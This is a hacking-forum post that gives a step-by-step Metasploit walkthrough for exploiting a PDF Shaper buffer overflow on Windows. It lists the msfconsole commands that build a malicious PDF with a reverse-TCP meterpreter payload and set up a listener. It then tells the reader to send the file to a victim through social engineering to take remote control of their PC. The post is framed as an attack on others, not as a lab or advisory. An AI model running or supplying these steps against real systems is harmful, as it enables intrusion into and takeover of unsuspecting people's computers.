• We just launched and are currently in beta. Join us as we build and grow the community.

Hack Remote Windows PC using PDF Shaper Buffer Overflow

gamerdd

Online Campaign Manager
G Rep
0
0
0
Rep
0
G Vouches
0
0
0
Vouches
0
Posts
134
Likes
59
Bits
1 MONTH
1 1 MONTH OF SERVICE
LEVEL 1 500 XP
PDF Shaper is prone to security vulnerability when processing PDF files. The vulnerability appear when we use Convert PDF to Image and use a specially crafted PDF file. This Metasploit module has been tested successfully on Win Xp, Win 7, Win 8, and Win 10.

Exploit Targets

PDF Shaper

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

1.png


Now type use exploit/windows/fileformat/pdf_shaper_bof

msf exploit (pdf_shaper_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (pdf_shaper_bof)>set lhost 192.168.1.16 (IP of Local Host)

msf exploit (pdf_shaper_bof)>exploit

2.png


After we successfully generate the malicious pdf File, it will stored on your local computer

/root/.msf4/local/msf.pdf

3.png


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.16

exploit

Now send your msf.pdf files to victim using any social engineering technique. Now when the victim will use PDF Shaper tool and click on PDF to Image option.

4.png


Now it will show Add File Option, victim will select the msf.pdf and click on Convert option.

5.png


6.png


Now you will get the meterpreter of victim PC.

7.png
 

414,728

309,677

309,686

Top